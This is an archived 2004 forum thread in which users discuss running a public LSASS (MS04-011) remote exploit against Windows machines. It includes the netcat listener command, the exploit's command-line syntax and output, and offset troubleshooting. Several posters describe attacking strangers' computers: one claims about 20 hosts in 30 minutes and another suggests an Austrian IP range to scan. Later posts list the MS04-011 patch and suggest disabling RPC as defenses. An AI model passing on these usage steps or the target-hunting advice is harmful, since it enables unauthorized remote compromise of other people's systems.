Well, it's look good ( for us ), but it doesn't work with me...
I've found vulnerable IP, ( i was in them... ), I've runned a shell with netcat, with parameters -l -p 444, so it's looked :
nc -l -p 444
I thought he was listening... well. Now, I launch the exploit, with the ip target, the port, and my ip. It's looked like this :
rlsasrv.exe (target ip ) 444 (my ip) shellcode size 316
And sometimes the line
Ret value = 1726
Where ret value seems randomized... but no shell. I've got no firewall, no AV, and the RPC services launched ( for upload ). What's I've done wrong ?
I've tried around 10 times, no one work... all were vulnerable...
I have to buy a new brain, or to get out that exploit ? O_o
[Edit] Oops, sorry, I've forgotted : I've got XP Pro ... :]
Excuse my english, I'm not from here... but I try to speak the better I can... :]
Macsou
Apr 29 2004, 10:07 AM
CODE
can you tel me from where did you get this link???
http://users.volja.net/exceed/RLsasrv.zip???It is an isp provider from my country so,i woud like to know...?
WWW.GOOGLE.COM
porc1978
Apr 29 2004, 12:50 PM
QUOTE (Icingtaupe @ Apr 29 2004, 03:17 AM)
Well, it's look good ( for us ), but it doesn't work with me...
I've found vulnerable IP, ( i was in them... ), I've runned a shell with netcat, with parameters -l -p 444, so it's looked :
nc -l -p 444
I thought he was listening... well. Now, I launch the exploit, with the ip target, the port, and my ip. It's looked like this :
rlsasrv.exe (target ip ) 444 (my ip) shellcode size 316
And sometimes the line
Ret value = 1726
Where ret value seems randomized... but no shell. I've got no firewall, no AV, and the RPC services launched ( for upload ). What's I've done wrong ?
I've tried around 10 times, no one work... all were vulnerable...
I have to buy a new brain, or to get out that exploit ? O_o
[Edit] Oops, sorry, I've forgotted : I've got XP Pro ... :]
Excuse my english, I'm not from here... but I try to speak the better I can... :]
me too....i've got many ips but no one give shells...also the exploit cmd line gave randomize ret value...like 53 1352 1726......
Ecko
Apr 29 2004, 02:36 PM
peace peopleZ
ok
so it works (tested often *g*)
if you get shellcode size 316 an nothing differnet (like Ret value e.g.) then it works surely! just search...a tip try the range 62.47.*.* (austria gays ) their is a good wy to test
forza
Apr 29 2004, 02:57 PM
This works man..
How to protect your LAN against this exploit? Could be used by WORMS !!
Synchr0
Apr 29 2004, 03:56 PM
thx man nice Exploit hheeh ill try it
Icingtaupe
Apr 29 2004, 04:13 PM
Well... this is a good exploit, he is beautiful, be some of us don't know who does it work, or WHY ot doesn't work...
If someone could type an example, a thing who (work) , it would be VERY useful, because there is a lot of computers who are waiting for us... :]
Serhat
Apr 29 2004, 04:13 PM
I tested the Exploit on my own boxes just to see if the exploit worked good on win 2k nothing happened {isn't patched} win xp crashed (blaster stylez) so it worked on XP
Serhat
net_runner
Apr 29 2004, 04:56 PM
thanks for the step by step guide...
LKM
Apr 29 2004, 05:00 PM
Well I'm actually trying it on my own 100% WINXP LAN, in which there is 10 VULNERABLE ip's
I also get a "ret value" everytime, without any incoming connexion on my listening port. The Comp are also getting a "system shutdown in 1min msg box" I never got a shell.
I heard this exploit wasn't working well on XP system, anyone can confirm that ?
misa
Apr 29 2004, 05:22 PM
i can confirm that it doesnt work on xp without modding
LKM
Apr 29 2004, 05:25 PM
Well I'd be interested a LOT if a modded exploit .c source was available that would give shell on WinXP. Even a "non reverse" one.
Is this only something to do about the OS offsets or is it deeper than that, misa?
EXPLOiTED
Apr 29 2004, 07:34 PM
Heh, thanks for getting off topic
Icingtaupe
Apr 29 2004, 08:11 PM
Well, I wan't only a little explanation :
This exploit only works on ENGLISH OS , isn't it ?
I've tried on French Systems, it seems don't wsorking...
I say the truth when I say it only work on eng. OS ? I've heard it's an history of offset...
LKM
Apr 29 2004, 08:35 PM
Well my LAN is 100% French WinXp and this exploit caused crash on them, but no shell.
SO I'd say it still "works" a bit on french system.
misa
Apr 29 2004, 08:40 PM
remember dcom with all those crashes? think what that was about, then think about this one and you'll figure it out
Erra
Apr 29 2004, 08:59 PM
For those that cant get this to work at all, have you thought that maybe its because your ISP is blocking certain ports?
I have been doing a bit of asking around, and it seems that if your ISP blocks those ports like 135 and 139, then you are out of luck, it just wont work for you.
Find another way around it........ get a different ISP..... whatever...
Icingtaupe
Apr 29 2004, 09:28 PM
My ISP doesn't block these ports... I know this because someone have tried this exploit on me...
LKM ... well, in this way, it's a method to force someone to reboot... it would be better with a shell ^^'
It work PERFECTLY, I've tried, and about 20 computers in a time of 30 minutes...
Try it, it's love it !
mamep
Apr 30 2004, 01:39 AM
it's not working for me like the old.. i don't know the problem.. but i've tried a lot of ips without any results...
Loxy
Apr 30 2004, 05:00 AM
My ISP blocks 139, and 445 along with some other common ones, all beccause of that lame ass kid who made MSBlaster worm(s) Shame!
LKM
Apr 30 2004, 05:41 AM
THX a lot icingtaupe, I will try it and tell you if it worked
EDIT : IT works PERFECTLY on WINXP SP1 FR WINXP FR WIN2K SP4 FR
That's what I tested.
Thanks a lot for sharing that
nettellect
Apr 30 2004, 09:19 AM
i updated all patches on my target machines and then tried out this exploit. nothing happend on any of the machine. where as i have heard that this this is still not pachted by MS. any body will explain that ? we are using win2000
AsuKa
Apr 30 2004, 09:37 AM
QUOTE
i updated all patches on my target machines and then tried out this exploit. nothing happend on any of the machine. where as i have heard that this this is still not pachted by MS. any body will explain that ? we are using win2000
Install the MS04-011 Patch
It fixes:
LSASS Vulnerability - CAN-2003-0533 LDAP Vulnerability - CAN-2003-0663 PCT Vulnerability - CAN-2003-0719 Winlogon Vulnerability - CAN-2003-0806 Metafile Vulnerability - CAN-2003-0906 Help and Support Center Vulnerability - CAN-2003-0907 Utility Manager Vulnerability - CAN-2003-0908 Windows Management Vulnerability - CAN-2003-0909 Local Descriptor Table Vulnerability - CAN-2003-0910 H.323 Vulnerability* - CAN-2004-0117 Virtual DOS Machine Vulnerability - CAN-2004-0118 Negotiate SSP Vulnerability - CAN-2004-0119 SSL Vulnerability - CAN-2004-0120 ASN.1 "Double Free" Vulnerability - CAN-2004-0123
Win XP patch: hxxp://www.microsoft.com/downloads/details.aspx?FamilyID=3549ea9e-da3f-43b9-a4f1-af243b6168f3&DisplayLang=en
prog
Apr 30 2004, 10:59 AM
^^ sweet, excellant
I have been messing with this for about 6 hours, this has the potential to do major damage.
Paul
Apr 30 2004, 11:58 AM
Does that means none knows a scanline for the exploit ? that checks if its vuln/not.
Ecko
Apr 30 2004, 01:04 PM
yes try DSScan its a vul scanner for this exploit...sorry no link at the moment but it have been posted on the board jus search.
peaz
Chizo
Apr 30 2004, 01:09 PM
Has anybody offsets for German, Spain etc?
Paul
Apr 30 2004, 01:17 PM
QUOTE (Ecko @ Apr 30 2004, 01:04 PM)
yes try DSScan its a vul scanner for this exploit...sorry no link at the moment but it have been posted on the board jus search.
peaz
that aint a commandline scanner, its a gui
Gargoyle
Apr 30 2004, 01:58 PM
Hm guys, can anyone tell me what i do wrong?
1. i startet nc -l -p 4000 on my cmd-box 2. i run the exploit
but i only geht ret value = 1736 etc.
has anyone a hint for me ?
Icingtaupe
Apr 30 2004, 02:25 PM
Yes.
Change the version of exploit ^^"
Hve you tried with the exploit in page °1, or on page 2° ?
The page 2° work a bit more than the first... :]
bullmoosekiller
Apr 30 2004, 02:50 PM
I was able to use exploit on Win2K eng sp4 but instead of using netcat (ConnectBackIP), I telnet directly to whatever port I use. Fortunely or infortunely here (depending on wich side you're standing), we use automatic Windows Update, so our workstation should be patched. I tried lsass exploit on unpatched french Windows XP sp1 and the exploit crash lsass and by that manner give error from NT Autority\system and reboot the computer after 59 sec. just as the MS blast exploit did. Also I heard that exploit need to have local session open on WinXP to be able to remotely control and I could confirm that (lsass crash when session's open and exploit failed when there's no opened local session).
So as soon as multiple language scode will appear within new modified exploit, then it will be a complete exploit.
Have a nice Week-end
striker13
Apr 30 2004, 03:02 PM
hello all nice exploit but i've a problem with nc i've testing on many ips ... when i run the exploit it's good but not for nc :
[*] Target: IP:ipifoundwithdsscan: OS: WinXP Professonal [universal] lsass.exe [*] Connecting to ipifoundwithdsscan:445 ... OK [*] Attacking ... OK
then i run nc : C:\Documents and Settings>strike>cd..
C:\Documents and Settings>..
C:\>nc -l -p 666 and nothing i'm not in c:\winnt\system32...
if you have a answer it's would be great sorry for my bad english and thx in advance
bullmoosekiller
Apr 30 2004, 03:17 PM
Forgot to mention that I used both version of lsass exploit code...
The first one ; /* from www.cnhonker.com */ and the 2nd one ; .::[ houseofdabus ]::.
gave me exactly the same result on Windows XP sp1 fr.
So the second (2nd) one isn't Universal as indicated in the code...!
Still have a nice Week-end
LKM
Apr 30 2004, 03:40 PM
bullmoosekiller > Je suis français aussi, et ça marche parfaitement sur WINXP SP1 FR UNPATCHED
translation : I tried it many times on WinXP SP1 unpatched host and the 2nd exploit worked perfectly.
bullmoosekiller
Apr 30 2004, 04:06 PM
Bonjour LKM ( moi j'suis Québecois )
Hi LKM (I'm french canadian)
Strange that you can remote control on your side and me not at all. Maybe the 2nd exploit is working here but I can't get shell whatever NC is listening or connecting or even telnet the compromise PC port.
Maybe explain me your technique or wich option you're using with NetCat.
digitalk2003
Apr 30 2004, 04:09 PM
Hello,
In my testings, I've come up with a problem in using the newest version of lsass(4/29/04). For some reason, a shell is not generated.
Instead of the remote shell, the command prompt just returned me to the directory where I had executed netcat from. Anybody else seen this? I also tried connecting through telnet without any luck.
Ciau...
digitalk2003
bullmoosekiller
Apr 30 2004, 04:23 PM
That's exactly what I'm experiencing during my own test and security assesment.
Flowers
Apr 30 2004, 05:50 PM
work well but, locked on the drive of the os.
allloco
Apr 30 2004, 05:52 PM
this ploit is working really fine and i am not only locked to the drive with the os installed
Qlimax
Apr 30 2004, 08:49 PM
i stiil don't understand how to secure it someone can post here the fix or how i do that? tnx..
ILX
Apr 30 2004, 10:15 PM
well, this gives me something to do this weekend... u can secure it in the same old way u could secure rpc before the microsoft patches, just disable rpc in the registry, works better than all ms patches put together
mich125
May 1 2004, 04:26 AM
hi can you tell exactly what have to be addeded to reg to disdable it
thx
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.